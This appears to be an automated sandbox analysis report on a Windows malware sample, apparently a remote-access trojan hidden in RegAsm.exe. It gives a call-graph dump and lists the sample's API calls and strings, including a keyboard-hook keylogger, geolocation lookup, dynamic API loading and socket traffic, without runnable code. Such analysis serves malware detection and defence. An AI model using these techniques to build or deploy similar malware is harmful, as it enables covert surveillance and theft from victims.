11 API calls 49115->49116 49128 404c30 49116->49128 49117 43bda0 new 21 API calls 49117->49128 49119 404c96 49121 404ca1 49119->49121 49119->49128 49120 4020b7 28 API calls 49120->49128 49233 404e26 99 API calls 49121->49233 49122 401fe2 28 API calls 49122->49128 49124 404ca8 49126 401fd8 11 API calls 49124->49126 49125 401fd8 11 API calls 49125->49128 49127 404cb1 49126->49127 49129 401fd8 11 API calls 49127->49129 49128->49117 49128->49119 49128->49120 49128->49122 49128->49125 49220 404cc3 49128->49220 49232 404b96 57 API calls 49128->49232 49130 404cba 49129->49130 49130->48323 49132->48343 49133->48323 49135->48359 49136->48323 49137->48323 49139 414e03 GetSystemDirectoryA 49138->49139 49155 414f0a 49138->49155 49140 414e1e 49139->49140 49139->49155 49159 441a8e 49140->49159 49142 414e3a 49166 441ae8 49142->49166 49144 414e4a LoadLibraryA 49145 414e7d 49144->49145 49146 414e6c GetProcAddress 49144->49146 49148 441a8e ___std_exception_copy 20 API calls 49145->49148 49150 414ece 49145->49150 49146->49145 49147 414e78 FreeLibrary 49146->49147 49147->49145 49149 414e99 49148->49149 49151 441ae8 20 API calls 49149->49151 49152 414ed4 GetProcAddress 49150->49152 49150->49155 49157 414eed 49150->49157 49153 414ea9 LoadLibraryA 49151->49153 49152->49150 49154 414eef FreeLibrary 49152->49154 49153->49155 49156 414ebd GetProcAddress 49153->49156 49154->49157 49155->49000 49156->49150 49158 414ec9 FreeLibrary 49156->49158 49157->49155 49158->49150 49160 441aa9 49159->49160 49161 441a9b 49159->49161 49173 44062d 20 API calls __dosmaperr 49160->49173 49161->49160 49164 441ac0 49161->49164 49163 441ab1 __cftoe 49163->49142 49164->49163 49174 44062d 20 API calls __dosmaperr 49164->49174 49167 441b04 49166->49167 49169 441af6 49166->49169 49175 44062d 20 API calls __dosmaperr 49167->49175 49169->49167 49170 441b2d 49169->49170 49172 441b0c __cftoe 49170->49172 49176 44062d 20 API calls __dosmaperr 49170->49176 49172->49144 49173->49163 49174->49163 49175->49172 49176->49172 49177->49009 49182 40515c 102 API calls 49179->49182 49181 405159 49182->49181 49183->49038 49184->49028 49185->49058 49186->49072 49187->49070 49188->49041 49190->49087 49194 41458e 49191->49194 49195 4145a3 ___scrt_initialize_default_local_stdio_options 49194->49195 49198 43f7ed 49195->49198 49201 43c540 49198->49201 49202 43c580 49201->49202 49203 43c568 49201->49203 49202->49203 49205 43c588 49202->49205 49216 44062d 20 API calls __dosmaperr 49203->49216 49206 43a837 __cftoe 36 API calls 49205->49206 49207 43c598 49206->49207 49217 43ccc6 20 API calls 2 library calls 49207->49217 49208 43502b CatchGuardHandler 5 API calls 49210 4145b1 49208->49210 49210->48343 49211 43c610 49218 43d334 51 API calls 3 library calls 49211->49218 49214 43c61b 49219 43cd30 20 API calls _free 49214->49219 49215 43c56d __cftoe 49215->49208 49216->49215 49217->49211 49218->49214 49219->49215 49221 4020df 11 API calls 49220->49221 49231 404cde 49221->49231 49222 404e13 49223 401fd8 11 API calls 49222->49223 49224 404e1c 49223->49224 49224->49119 49225 4041a2 28 API calls 49225->49231 49226 401fe2 28 API calls 49226->49231 49227 401fd8 11 API calls 49227->49231 49228 4020f6 28 API calls 49228->49231 49229 401fc0 28 API calls 49230 404dad CreateEventA CreateThread WaitForSingleObject CloseHandle 49229->49230 49230->49231 49234 415b25 49230->49234 49231->49222 49231->49225 49231->49226 49231->49227 49231->49228 49231->49229 49232->49128 49233->49124 49235 4020f6 28 API calls 49234->49235 49236 415b47 SetEvent 49235->49236 49237 415b5c 49236->49237 49238 4041a2 28 API calls 49237->49238 49239 415b76 49238->49239 49240 4020f6 28 API calls 49239->49240 49241 415b86 49240->49241 49242 4020f6 28 API calls 49241->49242 49243 415b98 49242->49243 49244 41beac 28 API calls 49243->49244 49245 415ba1 49244->49245 49246 4170c4 49245->49246 49247 415bc1 GetTickCount 49245->49247 49248 415d6a 49245->49248 49249 401e8d 11 API calls 49246->49249 49250 41bc1f 28 API calls 49247->49250 49248->49246 49311 415d20 49248->49311 49251 4170cd 49249->49251 49252 415bd2 49250->49252 49254 401fd8 11 API calls 49251->49254 49256 41bb77 GetTickCount 49252->49256 49255 4170d9 49254->49255 49257 401fd8 11 API calls 49255->49257 49258 415bde 49256->49258 49259 4170e5 49257->49259 49260 41bc1f 28 API calls 49258->49260 49261 415be9 49260->49261 49262 41bb27 30 API calls 49261->49262 49263 415bf7 49262->49263 49264 41bdaf 28 API calls 49263->49264 49265 415c05 49264->49265 49266 401e65 22 API calls 49265->49266 49267 415c13 49266->49267 49313 402f31 28 API calls 49267->49313 49269 415c21 49314 402ea1 28 API calls 49269->49314 49271 415c30 49272 402f10 28 API calls 49271->49272 49273 415c3f 49272->49273 49315 402ea1 28 API calls 49273->49315 49275 415c4e 49276 402f10 28 API calls 49275->49276 49277 415c5a 49276->49277 49316 402ea1 28 API calls 49277->49316 49279 415c64 49317 404aa1 61 API calls ctype 49279->49317 49281 415c73 49282 401fd8 11 API calls 49281->49282 49283 415c7c 49282->49283 49284 401fd8 11 API calls 49283->49284 49285 415c88 49284->49285 49286 401fd8 11 API calls 49285->49286 49287 415c94 49286->49287 49288 401fd8 11 API calls 49287->49288 49289 415ca0 49288->49289 49290 401fd8 11 API calls 49289->49290 49291 415cac 49290->49291 49292 401fd8 11 API calls 49291->49292 49293 415cb8 49292->49293 49294 401f09 11 API calls 49293->49294 49295 415cc1 49294->49295 49296 401fd8 11 API calls 49295->49296 49297 415cca 49296->49297 49298 401fd8 11 API calls 49297->49298 49299 415cd3 49298->49299 49300 401e65 22 API calls 49299->49300 49301 415cde 49300->49301 49302 43bb2c _strftime 40 API calls 49301->49302 49303 415ceb 49302->49303 49304 415cf0 49303->49304 49305 415d16 49303->49305 49307 415d09 49304->49307 49308 415cfe 49304->49308 49306 401e65 22 API calls 49305->49306 49306->49311 49310 404f51 105 API calls 49307->49310 49318 404ff4 82 API calls 49308->49318 49312 415d04 49310->49312 49311->49246 49319 4050e4 84 API calls 49311->49319 49312->49246 49313->49269 49314->49271 49315->49275 49316->49279 49317->49281 49318->49312 49319->49312 49321->48392 49322->48420 49323->48419 49324->48408 49325->48412 49326->48418 49327->48449 49332 40f7fd 49330->49332 49331 413584 3 API calls 49331->49332 49332->49331 49333 40f8a1 49332->49333 49335 40f891 Sleep 49332->49335 49352 40f82f 49332->49352 49336 409097 28 API calls 49333->49336 49334 409097 28 API calls 49334->49352 49335->49332 49339 40f8ac 49336->49339 49338 41bcef 28 API calls 49338->49352 49340 41bcef 28 API calls 49339->49340 49341 40f8b8 49340->49341 49365 41384f 14 API calls 49341->49365 49344 401f09 11 API calls 49344->49352 49345 40f8cb 49346 401f09 11 API calls 49345->49346 49348 40f8d7 49346->49348 49347 402093 28 API calls 49347->49352 49349 402093 28 API calls 49348->49349 49350 40f8e8 49349->49350 49353 4137aa 14 API calls 49350->49353 49351 4137aa 14 API calls 49351->49352 49352->49334 49352->49335 49352->49338 49352->49344 49352->49347 49352->49351 49363 40d0d1 112 API calls ___scrt_get_show_window_mode 49352->49363 49364 41384f 14 API calls 49352->49364 49354 40f8fb 49353->49354 49366 41288b TerminateProcess WaitForSingleObject 49354->49366 49356 40f903 ExitProcess 49367 412829 62 API calls 49358->49367 49364->49352 49365->49345 49366->49356 49368 4458c8 49370 4458d3 49368->49370 49371 4458fc 49370->49371 49372 4458f8 49370->49372 49374 448b04 49370->49374 49381 445920 DeleteCriticalSection 49371->49381 49375 44854a FindHandlerForForeignException 5 API calls 49374->49375 49376 448b2b 49375->49376 49377 448b34 49376->49377 49378 448b49 InitializeCriticalSectionAndSpinCount 49376->49378 49379 43502b CatchGuardHandler 5 API calls 49377->49379 49378->49377 49380 448b60 49379->49380 49380->49370 49381->49372 49382 42f97e 49383 42f989 49382->49383 49385 42f99d 49383->49385 49386 432f7f 49383->49386 49387 432f8a 49386->49387 49388 432f8e 49386->49388 49387->49385 49390 440f5d 49388->49390 49391 446206 49390->49391 49392 446213 49391->49392 49393 44621e 49391->49393 49394 4461b8 ___crtLCMapStringA 21 API calls 49392->49394 49395 446226 49393->49395 49401 44622f ___crtLCMapStringA 49393->49401 49400 44621b 49394->49400 49403 446802 20 API calls _free 49395->49403 49397 446234 49404 44062d 20 API calls __dosmaperr 49397->49404 49398 446259 HeapReAlloc 49398->49400 49398->49401 49400->49387 49401->49397 49401->49398 49405 443001 7 API calls 2 library calls 49401->49405 49403->49400 49404->49400 49405->49401 49406 40165e 49407 401666 49406->49407 49408 401669 49406->49408 49409 4016a8 49408->49409 49411 401696 49408->49411 49410 43455e new 22 API calls 49409->49410 49412 40169c 49410->49412 49413 43455e new 22 API calls 49411->49413 49413->49412 49414 426cdc 49419 426d59 send 49414->49419 49420 41e04e 49421 41e063 ctype ___scrt_get_show_window_mode 49420->49421 49422 432f55 21 API calls 49421->49422 49433 41e266 49421->49433 49426 41e213 ___scrt_get_show_window_mode 49422->49426 49424 41e277 49425 432f55 21 API calls 49424->49425 49427 41e21a 49424->49427 49429 41e2b0 ___scrt_get_show_window_mode 49425->49429 49426->49427 49428 432f55 21 API calls 49426->49428 49431 41e240 ___scrt_get_show_window_mode 49428->49431 49429->49427 49435 4335db 49429->49435 49431->49427 49432 432f55 21 API calls 49431->49432 49432->49433 49433->49427 49434 41dbf3 DeleteCriticalSection EnterCriticalSection LeaveCriticalSection ___scrt_get_show_window_mode 49433->49434 49434->49424 49438 4334fa 49435->49438 49437 4335e3 49437->49427 49439 433509 49438->49439 49440 433513 49438->49440 49439->49437 49440->49439 49441 432f55 21 API calls 49440->49441 49442 433534 49441->49442 49442->49439 49444 4338c8 CryptAcquireContextA 49442->49444 49445 4338e9 CryptGenRandom 49444->49445 49447 4338e4 49444->49447 49446 4338fe CryptReleaseContext 49445->49446 49445->49447 49446->49447 49447->49439 49448 426c6d 49454 426d42 recv 49448->49454

                                                  Executed Functions

                                                  Function 0041CBE1 Relevance: 148.9, APIs: 52, Strings: 33, Instructions: 176libraryloaderCOMMON
                                                  Download Yara Rule

                                                  Control-flow Graph

                                                  APIs
                                                  • LoadLibraryA.KERNEL32(Psapi), ref: 0041CBF6
                                                  • GetProcAddress.KERNEL32(00000000,?,?,?,?,0040EA1C), ref: 0041CBFF
                                                  • GetModuleHandleA.KERNEL32(Kernel32,GetProcessImageFileNameW,?,?,?,?,0040EA1C), ref: 0041CC16
                                                  • GetProcAddress.KERNEL32(00000000,?,?,?,?,0040EA1C), ref: 0041CC19
                                                  • LoadLibraryA.KERNEL32(shcore), ref: 0041CC2B
                                                  • GetProcAddress.KERNEL32(00000000,?,?,?,?,0040EA1C), ref: 0041CC2E
                                                  • LoadLibraryA.KERNEL32(user32), ref: 0041CC3F
                                                  • GetProcAddress.KERNEL32(00000000,?,?,?,?,0040EA1C), ref: 0041CC42
                                                  • LoadLibraryA.KERNEL32(ntdll), ref: 0041CC54
                                                  • GetProcAddress.KERNEL32(00000000,?,?,?,?,0040EA1C), ref: 0041CC57
                                                  • LoadLibraryA.KERNEL32(kernel32), ref: 0041CC63
                                                  • GetProcAddress.KERNEL32(00000000,?,?,?,?,0040EA1C), ref: 0041CC66
                                                  • GetModuleHandleA.KERNEL32(kernel32,IsWow64Process,?,?,?,?,0040EA1C), ref: 0041CC77
                                                  • GetProcAddress.KERNEL32(00000000,?,?,?,?,0040EA1C), ref: 0041CC7A
                                                  • GetModuleHandleA.KERNEL32(kernel32,GetComputerNameExW,?,?,?,?,0040EA1C), ref: 0041CC8B
                                                  • GetProcAddress.KERNEL32(00000000,?,?,?,?,0040EA1C), ref: 0041CC8E
                                                  • LoadLibraryA.KERNEL32(Shell32), ref: 0041CC9F
                                                  • GetProcAddress.KERNEL32(00000000,?,?,?,?,0040EA1C), ref: 0041CCA2
                                                  • GetModuleHandleA.KERNEL32(kernel32,SetProcessDEPPolicy,?,?,?,?,0040EA1C), ref: 0041CCB3
                                                  • GetProcAddress.KERNEL32(00000000,?,?,?,?,0040EA1C), ref: 0041CCB6
                                                  • GetModuleHandleA.KERNEL32(user32,EnumDisplayDevicesW,?,?,?,?,0040EA1C), ref: 0041CCC7
                                                  • GetProcAddress.KERNEL32(00000000,?,?,?,?,0040EA1C), ref: 0041CCCA
                                                  • GetModuleHandleA.KERNEL32(user32,EnumDisplayMonitors,?,?,?,?,0040EA1C), ref: 0041CCDB
                                                  • GetProcAddress.KERNEL32(00000000,?,?,?,?,0040EA1C), ref: 0041CCDE
                                                  • GetModuleHandleA.KERNEL32(user32,GetMonitorInfoW,?,?,?,?,0040EA1C), ref: 0041CCEF
                                                  • GetProcAddress.KERNEL32(00000000,?,?,?,?,0040EA1C), ref: 0041CCF2
                                                  • GetModuleHandleA.KERNEL32(kernel32,GetSystemTimes,?,?,?,?,0040EA1C), ref: 0041CD03
                                                  • GetProcAddress.KERNEL32(00000000,?,?,?,?,0040EA1C), ref: 0041CD06
                                                  • LoadLibraryA.KERNEL32(Shlwapi), ref: 0041CD14
                                                  • GetProcAddress.KERNEL32(00000000,?,?,?,?,0040EA1C), ref: 0041CD17
                                                  • LoadLibraryA.KERNEL32(kernel32), ref: 0041CD28
                                                  • GetProcAddress.KERNEL32(00000000,?,?,?,?,0040EA1C), ref: 0041CD2B
                                                  • GetModuleHandleA.KERNEL32(ntdll,NtSuspendProcess,?,?,?,?,0040EA1C), ref: 0041CD38
                                                  • GetProcAddress.KERNEL32(00000000,?,?,?,?,0040EA1C), ref: 0041CD3B
                                                  • GetModuleHandleA.KERNEL32(ntdll,NtResumeProcess,?,?,?,?,0040EA1C), ref: 0041CD48
                                                  • GetProcAddress.KERNEL32(00000000,?,?,?,?,0040EA1C), ref: 0041CD4B
                                                  • LoadLibraryA.KERNEL32(Iphlpapi), ref: 0041CD5D
                                                  • GetProcAddress.KERNEL32(00000000,?,?,?,?,0040EA1C), ref: 0041CD60
                                                  • LoadLibraryA.KERNEL32(Iphlpapi), ref: 0041CD6D
                                                  • GetProcAddress.KERNEL32(00000000,?,?,?,?,0040EA1C), ref: 0041CD70
                                                  • GetModuleHandleA.KERNEL32(ntdll,NtQueryInformationProcess,?,?,?,?,0040EA1C), ref: 0041CD81
                                                  • GetProcAddress.KERNEL32(00000000,?,?,?,?,0040EA1C), ref: 0041CD84
                                                  • GetModuleHandleA.KERNEL32(kernel32,GetFinalPathNameByHandleW,?,?,?,?,0040EA1C), ref: 0041CD95
                                                  • GetProcAddress.KERNEL32(00000000,?,?,?,?,0040EA1C), ref: 0041CD98
                                                  • LoadLibraryA.KERNEL32(Rstrtmgr), ref: 0041CDAA
                                                  • GetProcAddress.KERNEL32(00000000,?,?,?,?,0040EA1C), ref: 0041CDAD
                                                  • LoadLibraryA.KERNEL32(Rstrtmgr), ref: 0041CDBA
                                                  • GetProcAddress.KERNEL32(00000000,?,?,?,?,0040EA1C), ref: 0041CDBD
                                                  • LoadLibraryA.KERNEL32(Rstrtmgr), ref: 0041CDCA
                                                  • GetProcAddress.KERNEL32(00000000,?,?,?,?,0040EA1C), ref: 0041CDCD
                                                  • LoadLibraryA.KERNEL32(Rstrtmgr), ref: 0041CDDA
                                                  • GetProcAddress.KERNEL32(00000000,?,?,?,?,0040EA1C), ref: 0041CDDD
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000009.00000002.906121131.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_9_2_400000_RegAsm.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: AddressProc$LibraryLoad$HandleModule
                                                  • String ID: EnumDisplayDevicesW$EnumDisplayMonitors$GetComputerNameExW$GetConsoleWindow$GetExtendedTcpTable$GetExtendedUdpTable$GetFinalPathNameByHandleW$GetMonitorInfoW$GetProcessImageFileNameW$GetSystemTimes$GlobalMemoryStatusEx$Iphlpapi$IsUserAnAdmin$IsWow64Process$Kernel32$NtQueryInformationProcess$NtResumeProcess$NtSuspendProcess$NtUnmapViewOfSection$Psapi$RmEndSession$RmGetList$RmRegisterResources$RmStartSession$Rstrtmgr$SetProcessDEPPolicy$SetProcessDpiAwareness$Shell32$Shlwapi$kernel32$ntdll$shcore$user32
                                                  • API String ID: 4236061018-3687161714
                                                  • Opcode ID: 6b21e851a0d3a51eeec0044f2aae63c374cf6436741b915ef551e22e35f3a136
                                                  • Instruction ID: 87b5fa294a9840a4da0a94e675c49188b16ea4214af7843bc20054d8537ab592
                                                  • Opcode Fuzzy Hash: 6b21e851a0d3a51eeec0044f2aae63c374cf6436741b915ef551e22e35f3a136
                                                  • Instruction Fuzzy Hash: 06419AA0E8035879DA107BB65D8DE3B3E5CD9857953614837B05C93550FBBCDC408EAE
                                                  Function 0040A2F3 Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 63windowCOMMON
                                                  Download Yara Rule

                                                  Control-flow Graph

                                                  • Executed
                                                  • Not Executed
                                                  control_flow_graph 1288 40a2f3-40a30a 1289 40a30c-40a326 GetModuleHandleA SetWindowsHookExA 1288->1289 1290 40a36e-40a37e GetMessageA 1288->1290 1289->1290 1293 40a328-40a36c GetLastError call 41bc1f call 4052fd call 402093 call 41b580 call 401fd8 1289->1293 1291 40a380-40a398 TranslateMessage DispatchMessageA 1290->1291 1292 40a39a 1290->1292 1291->1290 1291->1292 1294 40a39c-40a3a1 1292->1294 1293->1294
                                                  APIs
                                                  • GetModuleHandleA.KERNEL32(00000000,00000000), ref: 0040A30E
                                                  • SetWindowsHookExA.USER32(0000000D,0040A2DF,00000000), ref: 0040A31C
                                                  • GetLastError.KERNEL32 ref: 0040A328
                                                    • Part of subcall function 0041B580: GetLocalTime.KERNEL32(00000000), ref: 0041B59A
                                                  • GetMessageA.USER32 ref: 0040A376
                                                  • TranslateMessage.USER32(?), ref: 0040A385
                                                  • DispatchMessageA.USER32(?), ref: 0040A390
                                                  Strings
                                                  • Keylogger initialization failure: error , xrefs: 0040A33C
                                                  Memory Dump Source
                                                  • Source File: 00000009.00000002.906121131.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_9_2_400000_RegAsm.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: Message$DispatchErrorHandleHookLastLocalModuleTimeTranslateWindows
                                                  • String ID: Keylogger initialization failure: error
                                                  • API String ID: 3219506041-952744263
                                                  • Opcode ID: 25e136c2ffc33636d357cd73d29a3aedc6f18b6bf984cd9f7b53386870d4f0b3
                                                  • Instruction ID: 8743f2250fb8cae6a99ae5fb3d4b34fe2baf279f6720e4878f05ffc9670b3ffc
                                                  • Opcode Fuzzy Hash: 25e136c2ffc33636d357cd73d29a3aedc6f18b6bf984cd9f7b53386870d4f0b3
                                                  • Instruction Fuzzy Hash: 6011BF31510301EBC710BB769D0986B77ACEA95715B20097EFC82E22D1EB34C910CBAA
                                                  Function 0041B411 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 69networkfileCOMMON
                                                  Download Yara Rule

                                                  Control-flow Graph

                                                  • Executed
                                                  • Not Executed
                                                  control_flow_graph 1370 41b411-41b454 call 4020df call 43bda0 InternetOpenW InternetOpenUrlW 1375 41b456-41b477 InternetReadFile 1370->1375 1376 41b479-41b499 call 4020b7 call 403376 call 401fd8 1375->1376 1377 41b49d-41b4a0 1375->1377 1376->1377 1379 41b4a2-41b4a4 1377->1379 1380 41b4a6-41b4b3 InternetCloseHandle * 2 call 43bd9b 1377->1380 1379->1375 1379->1380 1383 41b4b8-41b4c2 1380->1383
                                                  APIs
                                                  • InternetOpenW.WININET(00000000,00000001,00000000,00000000,00000000), ref: 0041B438
                                                  • InternetOpenUrlW.WININET(00000000,http://geoplugin.net/json.gp,00000000,00000000,80000000,00000000), ref: 0041B44E
                                                  • InternetReadFile.WININET(00000000,00000000,0000FFFF,00000000), ref: 0041B467
                                                  • InternetCloseHandle.WININET(00000000), ref: 0041B4AD
                                                  • InternetCloseHandle.WININET(00000000), ref: 0041B4B0
                                                  Strings
                                                  • http://geoplugin.net/json.gp, xrefs: 0041B448
                                                  Memory Dump Source
                                                  • Source File: 00000009.00000002.906121131.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_9_2_400000_RegAsm.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: Internet$CloseHandleOpen$FileRead
                                                  • String ID: http://geoplugin.net/json.gp
                                                  • API String ID: 3121278467-91888290
                                                  • Opcode ID: 9768f0b08c90a41eda23d1866a8ae5095f1886f629a7c574ec4f9b2402cf94c4
                                                  • Instruction ID: e320c318363c88f1c040182635621d8729538b68a2f0080144892bf513bd3cc2
                                                  • Opcode Fuzzy Hash: 9768f0b08c90a41eda23d1866a8ae5095f1886f629a7c574ec4f9b2402cf94c4
                                                  • Instruction Fuzzy Hash: 011198311053126BD224AB269C49EBF7F9CEF86765F10043EF945A2282DB689C44C6FA
                                                  Function 0040F7E2 Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 88sleepCOMMON
                                                  Download Yara Rule

                                                  Control-flow Graph

                                                  APIs
                                                    • Part of subcall function 00413584: RegOpenKeyExA.KERNEL32(80000001,00000000,00000000,00020019,?), ref: 004135A4
                                                    • Part of subcall function 00413584: RegQueryValueExA.KERNEL32 ref: 004135C2
                                                    • Part of subcall function 00413584: RegCloseKey.KERNEL32(?), ref: 004135CD
                                                  • Sleep.KERNEL32(00000BB8), ref: 0040F896
                                                  • ExitProcess.KERNEL32 ref: 0040F905
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000009.00000002.906121131.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_9_2_400000_RegAsm.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: CloseExitOpenProcessQuerySleepValue
                                                  • String ID: 5.1.1 Pro$override$pth_unenc
                                                  • API String ID: 2281282204-2344886030
                                                  • Opcode ID: 12348d3a2fbe885265e601d0d8f624f68943fb23a48e4508fc59bb7df0f8f03e
                                                  • Instruction ID: d275b5d15c9ff05a0ec0da3c9587874d7690dc7fa5d0ec02d6e8a4ede61593ab
                                                  • Opcode Fuzzy Hash: 12348d3a2fbe885265e601d0d8f624f68943fb23a48e4508fc59bb7df0f8f03e
                                                  • Instruction Fuzzy Hash: 5921E171B0420127D6087676885B6AE399A9B80708F50453FF409672D7FF7C8E0483AF
                                                  Function 004338C8 Relevance: 4.5, APIs: 3, Instructions: 30encryptionCOMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • CryptAcquireContextA.ADVAPI32(00000000,00000000,00000000,00000001,F0000000,?,00000000,00433550,00000034,?,?,0092A308), ref: 004338DA
                                                  • CryptGenRandom.ADVAPI32(00000000,?,?,?,?,?,?,?,?,?,?,?,004335E3,00000000,?,00000000), ref: 004338F0
                                                  • CryptReleaseContext.ADVAPI32(00000000,00000000,?,?,?,?,?,?,?,?,?,004335E3,00000000,?,00000000,0041E2E2), ref: 00433902
                                                  Memory Dump Source
                                                  • Source File: 00000009.00000002.906121131.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_9_2_400000_RegAsm.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: Crypt$Context$AcquireRandomRelease
                                                  • String ID:
                                                  • API String ID: 1815803762-0
                                                  • Opcode ID: 81ae4bbc27a0383ddd18646ed4cc5f88ed8aa0b0f15284250c3048956b898281
                                                  • Instruction ID: d68cd6f5f98cbfa2ab0450769c499d20ea76a36e668e3df749659bd42d9a4b78
                                                  • Opcode Fuzzy Hash: 81ae4bbc27a0383ddd18646ed4cc5f88ed8aa0b0f15284250c3048956b898281
                                                  • Instruction Fuzzy Hash: 40E09A31208310FBEB301F21AC08F573AA5EF89B66F200A3AF256E40E4D6A68801965C
                                                  Function 004489D7 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 30timeCOMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • GetSystemTimeAsFileTime.KERNEL32(00000000,0043AB37), ref: 00448A16
                                                  Strings
                                                  • GetSystemTimePreciseAsFileTime, xrefs: 004489F2
                                                  Memory Dump Source
                                                  • Source File: 00000009.00000002.906121131.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_9_2_400000_RegAsm.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: Time$FileSystem
                                                  • String ID: GetSystemTimePreciseAsFileTime
                                                  • API String ID: 2086374402-595813830
                                                  • Opcode ID: c8476c07d91a2673d79eb1bf06ec4ca2dbc9f8e1099c36818990a3b57f66e430
                                                  • Instruction ID: bacba389ed7ed90706db716b221aab5ed2509560655679cc0f09f15d90276a03
                                                  • Opcode Fuzzy Hash: c8476c07d91a2673d79eb1bf06ec4ca2dbc9f8e1099c36818990a3b57f66e430
                                                  • Instruction Fuzzy Hash: 79E0E531A81618FBD7116B25EC02E7EBB50DB08B02B10027FFC05A7292EE754D14D6DE
                                                  Function 0041B69E Relevance: 1.5, APIs: 1, Instructions: 41COMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • GetUserNameW.ADVAPI32(?,0040F25E), ref: 0041B6D3
                                                  Memory Dump Source
                                                  • Source File: 00000009.00000002.906121131.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_9_2_400000_RegAsm.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: NameUser
                                                  • String ID:
                                                  • API String ID: 2645101109-0
                                                  • Opcode ID: 2a75debd1ac83804218ef8ff91a3dd31c7e5d47f43b5da7d436b4f8c80832694
                                                  • Instruction ID: 8360233331794fbd8bccde093e114755ab2a7c2896376219b9d5f45c8fb32f7b
                                                  • Opcode Fuzzy Hash: 2a75debd1ac83804218ef8ff91a3dd31c7e5d47f43b5da7d436b4f8c80832694
                                                  • Instruction Fuzzy Hash: 90014F7190011CABCB01EBD1DC45EEDB7BCAF44309F10016AB505B21A1EFB46E88CBA8
                                                  Function 00434BD8 Relevance: 1.5, APIs: 1, Instructions: 3COMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • SetUnhandledExceptionFilter.KERNEL32 ref: 00434BDD
                                                  Memory Dump Source
                                                  • Source File: 00000009.00000002.906121131.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_9_2_400000_RegAsm.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: ExceptionFilterUnhandled
                                                  • String ID:
                                                  • API String ID: 3192549508-0
                                                  • Opcode ID: 2ffe05228c785604148d814c7fc250910b5f8136668f43492b8067ac5164d55b
                                                  • Instruction ID: 702e07acd891e046c8aea5fc6397425f5e3bd38ef0af78e1c7fed93ac6412050
                                                  • Opcode Fuzzy Hash: 2ffe05228c785604148d814c7fc250910b5f8136668f43492b8067ac5164d55b
                                                  • Instruction Fuzzy Hash:
                                                  Function 0040EA00 Relevance: 86.5, APIs: 15, Strings: 34, Instructions: 795COMMON
                                                  Download Yara Rule

                                                  Control-flow Graph

                                                  • Executed
                                                  • Not Executed
                                                  control_flow_graph 5 40ea00-40ea82 call 41cbe1 GetModuleFileNameW call 40f3fe call 4020f6 * 2 call 41beac call 40fb52 call 401e8d call 43fd50 22 40ea84-40eac9 call 40fbee call 401e65 call 401fab call 410f72 call 40fb9f call 40f3eb 5->22 23 40eace-40eb96 call 401e65 call 401fab call 401e65 call 40531e call 406383 call 401fe2 call 401fd8 * 2 call 401e65 call 401fc0 call 405aa6 call 401e65 call 4051e3 call 401e65 call 4051e3 5->23 49 40ef2d-40ef3e call 401fd8 22->49 69 40eb98-40ebe3 call 406c59 call 401fe2 call 401fd8 call 401fab call 413584 23->69 70 40ebe9-40ec04 call 401e65 call 40b9f8 23->70 69->70 102 40f38a-40f3a5 call 401fab call 4139e4 call 4124b0 69->102 80 40ec06-40ec25 call 401fab call 413584 70->80 81 40ec3e-40ec45 call 40d0a4 70->81 80->81 97 40ec27-40ec3d call 401fab call 4139e4 80->97 90 40ec47-40ec49 81->90 91 40ec4e-40ec55 81->91 94 40ef2c 90->94 95 40ec57 91->95 96 40ec59-40ec65 call 41b354 91->96 94->49 95->96 103 40ec67-40ec69 96->103 104 40ec6e-40ec72 96->104 97->81 126 40f3aa-40f3db call 41bcef call 401f04 call 413a5e call 401f09 * 2 102->126 103->104 107 40ecb1-40ecc4 call 401e65 call 401fab 104->107 108 40ec74 call 407751 104->108 127 40ecc6 call 407790 107->127 128 40eccb-40ed53 call 401e65 call 41bcef call 401f13 call 401f09 call 401e65 call 401fab call 401e65 call 401fab call 401e65 call 401fab call 401e65 call 401fab 107->128 117 40ec79-40ec7b 108->117 120 40ec87-40ec9a call 401e65 call 401fab 117->120 121 40ec7d-40ec82 call 407773 call 40729b 117->121 120->107 140 40ec9c-40eca2 120->140 121->120 157 40f3e0-40f3ea call 40dd7d call 414f65 126->157 127->128 177 40ed55-40ed6e call 401e65 call 401fab call 43bb56 128->177 178 40edbb-40edbf 128->178 140->107 144 40eca4-40ecaa 140->144 144->107 147 40ecac call 40729b 144->147 147->107 177->178 205 40ed70-40edb6 call 401e65 call 401fab call 401e65 call 401fab call 40da6f call 401f13 call 401f09 177->205 180 40ef41-40efa1 call 436f10 call 40247c call 401fab * 2 call 413733 call 409092 